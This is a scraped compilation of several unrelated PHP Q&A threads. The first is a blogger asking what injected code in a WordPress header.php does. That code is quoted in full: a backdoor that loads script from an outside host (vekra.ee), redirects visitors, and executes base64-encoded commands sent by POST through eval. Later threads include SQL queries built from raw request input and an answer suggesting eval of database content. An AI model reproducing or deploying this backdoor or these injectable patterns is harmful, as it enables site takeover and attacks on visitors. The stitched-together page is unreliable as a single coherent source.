This question already has answers here:
Closed 10 years ago.
Possible Duplicate:
Got Hacked - Anyone know what this PHP Code Does?
I just found this on one of my blogs header.php file, I will like to know if somebody can say what is that ? (scroll to the right so see all the code)
Thanks
<meta http-equiv="Content-Type" content="<?php global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!#$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!#headers_sent()) { #setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!#headers_sent()) { #setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = #$_SERVER["HTTP_HOST"].#$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://vekra.ee/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }
bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>" />
What I will like to know is what does this code. (scroll to the right so see all the code)
Thanks!
Double douplicate:
Here: Got Hacked - Anyone know what this PHP Code Does?
and
Here: What this php script will do ? is it Malicious php Code?
Now tis is a new practice affecting wordpress ???
From the wordpress function reference for bloginfo:
Displays information about your blog, mostly gathered from the
information you supply in your User Profile and General Options from
the WordPress Administration panels (Settings → General). It can be
used anywhere within a page template. This always prints a result to
the browser. If you need the values for use in PHP, use
In this special case:
Basically it fetches the content type (html_type) and the charset from wordpress and puts it into the HTML header of the page it creates.
Related
This question already has answers here:
How to remove the querystring and get only the URL?
(16 answers)
Closed 2 months ago.
My goal: compare the actual url to a stored url in MySQL DB. If there's a match the page title and meta description info is loaded from the DB into the fields on the page.
Problem: I need to remove the query string so the url is clean for the comparison.
The existing code works for the main pages that list the blogs/lessons/etc, but when I go to page 2, 3, 4, etc the query string breaks the comparison.
In the code you will see $actual_link - that needs to have the query string removed and that is what I have yet to find a solution that actually works, as for what I've tried, there have been too many iterations to remember them.
Server Info: PHP 7.3.17; MySQL MariaDB-10.2.32; Apache-2.4.43/
$actual_link = "https://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]";
$sql = "SELECT * FROM meta WHERE siteLink = '$actual_link'";
$result = mysqli_query($link, $sql);
if (mysqli_num_rows($result) > 0)
{
while($row = mysqli_fetch_assoc($result))
{
?>
<?php include_once "myHead.php"; ?>
<title><?php echo $row["title"]; ?></title>
<meta name="description" content="<?php echo $row["meta_desc_content"]; ?>">
<?php
}
}
else
{
echo "Shit, it ain't working.";
}
?>
PHP provides a nice helper method called parse_url to get certain parts of an url:
// $actual_link = 'www.stackoverflow.com/test';
$urlParts = parse_url($actual_link);
$formattedUrl = $urlParts['host']; // www.stackoverflow.com
Docs: https://www.php.net/manual/en/function.parse-url.php
Use strtok()
like this: $baseUrl = strtok($actual_link, '?');
This question already has answers here:
PHP MySQL only displays Blank Table
(3 answers)
Closed 2 years ago.
I'm learning PHP for the first time and this exercise gives back a blank page. I don't understand why, it's just defining two functions (number 1 and 2), then multiplying both, then printing on screen the result.
<!DOCTYPE html>
<html>
<head>
</head>
<body>
<?php
$number1 = 1;
$number2 = 2;
function multiply($number1, $number2)
{
$result = ($number1 * $number2);
return $result;
}
?>
</body>
</html>
Same with another function, it's supposed to print a Hello world string, yet another blank page.
<?php
$head = "Hello world PHP";
function header($head)
{
return $head;
}
?>
To print to screen something like this will work:
print_r(multiply($number1, $number2));
I'd like to preface that I am not too fluent in php so i'm trying to understand and build php as i go.
I am attempting to add a custom Slidedeck slider to my website, http://cfsb.org/ . I currently have one in the header, but would like to change it on a per page basis.
I currently have:
function slidedecktwo_header_home() {
if (is_home()) {
echo do_shortcode('[SlideDeck2 id=xxx]');
}
}
add_action('genesis_header', 'slidedecktwo_header_home');
But when i try to add something like
else if (is_page(PAGE_ID = x)) {
echo do_shortcode('[SlideDeck2 id=xxx');
}
My webpage crashes and I have to delete the code before my website returns. Anyone see some obvious problems?
Thanks in advance.
Not sure if what you posted is the actual PHP you tried, but there are definite syntax errors.
Your code should look more like this (I added a random ID passed as an integer to the is_page() function):
function slidedecktwo_header_home() {
if ( is_home() ) {
echo do_shortcode('[SlideDeck2 id=xxx]');
} elseif ( is_page(42) ) {
echo do_shortcode('[SlideDeck2 id=xxx]');
}
}
add_action('genesis_header', 'slidedecktwo_header_home');
In your snippet, you had is_page( PAGE_ID = x ) and your shortcode snippet wasn't closed with a closing bracket ]
This question already has answers here:
How do you parse and process HTML/XML in PHP?
(31 answers)
Closed 8 years ago.
How can we take in PHP or jQuery that is written between the <h2> </h2> of each page to put the title of my pages so that each page is different.
Example:
<section class="sub_header">
<h2>Contact</h2>
<h5>Contactez-nous !</h5>
</section>
=> <title>Contact</title>
It's possible ?
PHP, jQuery load() function...?
Thanks
My soluce:
I answer because it could be used for some.
I'll add this little code on important pages. using the superglobal 'REQUEST_URI':
<?php
if ($_SERVER['REQUEST_URI'] == '/index_contact.html') {
$data = 'Contact';
}elseif(
$_SERVER['REQUEST_URI'] == '/index_blog.html') {
$data = 'The blog';
}else{
$data = 'Default title.';
}
// Display the name of the page if data exists
if (isset($data)) {echo $data;} ?>
Hoping that it will be useful for some.
You can try with prag_match to extract data between h1 tag.
$data ="Your content goes here";
preg_match('/<h2>(.*?)<\/h2>/s', $data, $matches);
echo $matches[1];
exit;
Here's my code:
<?php
if(isset($_GET['p']))
{
$nshortname = strip_tags($_GET['p']);
$check = mysql_query("SELECT * FROM pages WHERE `shortname` = '$nshortname'");
if(mysql_num_rows($check) == 0)
{
echo '<center><font size="50" style="font-weight:bold;">404</font><br>Appears this page is a dead end</center>';
}
else
{
$h = mysql_fetch_array($check);
//post details
$title = $h["title"];
$content = $h["content"];
$shortname = $h["shortname"];
// Start of page content
echo '
<p>
<font size="5pt">'.$title.'</font><br><hr>
'.$content.'<br>
';
// End of page content
}
}
else
{
echo 'No page has been selected to view';
}
?>
What it does exactly, is it grabs pages from my database and reads them, so for example if I have a page in that table called "test" I can go to it by http://mylink.com/?p=test. Although i've come up with an issue. On one of those pages that come from the database I want to include but when I type it into the database field and go back to the page it shows with nothing.
I went to the source of the page in my browser and found out the code turned into <!--?php include "inc/extra/plugins/header/slideshow.php"?-->
Does anyone know how I can sold it from turning into <!--? and make my include code work.
I would caution against using eval() of unknown content. Basically, the content comes from your database, but that doesn't guarantee it's safe to execute as code! There are a lot of ways it could cause errors or do something malicious.
But you also have other dangerous security gaffes in your code. You should learn about how to defend against SQL injection vulnerabilities and Cross-Site Scripting (XSS) vulnerabilities and File Inclusion vulnerabilities.
Use mysql_real_escape_string() if you are still using the deprecated ext/mysql. But if you can, switch to mysqli or PDO_mysql and use prepared statements with parameters.
Always output dynamic content with htmlspecialchars(). What if the content contains Javascript code? It could cause mischief.
Never eval() arbitrary content as code. You have no control over what that content is, or what it could do when you execute it.
Be as restrictive as possible - if you want to include a file, store the filename separately from content (e.g. in a separate column), and use it only for including files.
Here's an example with some of these problems fixed in your code:
<?php
if(isset($_GET['p']))
{
$nshortname = mysql_real_escape_string($_GET['p']);
$check = mysql_query("SELECT * FROM pages WHERE `shortname` = '$nshortname'");
if(mysql_num_rows($check) == 0)
{
echo '<center><font size="50" style="font-weight:bold;">404</font><br>Appears this page is a dead end</center>';
}
else
{
$h = mysql_fetch_array($check);
//post details
$title = htmlspecialchars($h["title"]);
$content = htmlspecialchars($h["content"]);
$shortname = $h["shortname"];
// Start of page content
echo '
<p>
<font size="5pt">'.$title.'</font><br><hr>
'.$content.'<br>
';
// End of page content
// Start of include
if ($h["include"]) {
// strip out anything like "../../.." etc.
// to make sure this is only a simple filename.
$include = basename($h["include"]);
include "inc/extra/plugins/header/{$include}.php";
}
// End of plugin inclusion
}
}
else
{
echo 'No page has been selected to view';
}
?>
Also check out http://www.sitepoint.com/php-security-blunders/ and http://phpsec.org/projects/phpsecinfo/
Re your comments:
To allow a limited set of basic HTML, the best tool you need to use is http://htmlpurifier.org
I'm not sure what to say about your include displaying code instead of working. I just tested this, and the following two files seem to work exactly as intended:
foo.php:
<?php
echo "<h1>START FOO</h2>";
if ($_GET["include"]) {
$include = basename($_GET["include"]);
include "./{$include}.php";
}
echo "<h1>END FOO</h2>";
bar.php:
<?php
echo "<h2>BAR</h2>";
If you have a variable $content which is html with php, you can use
eval("?>" . $content . "<?php");
This will output $content having processed all the <?php ?> tags.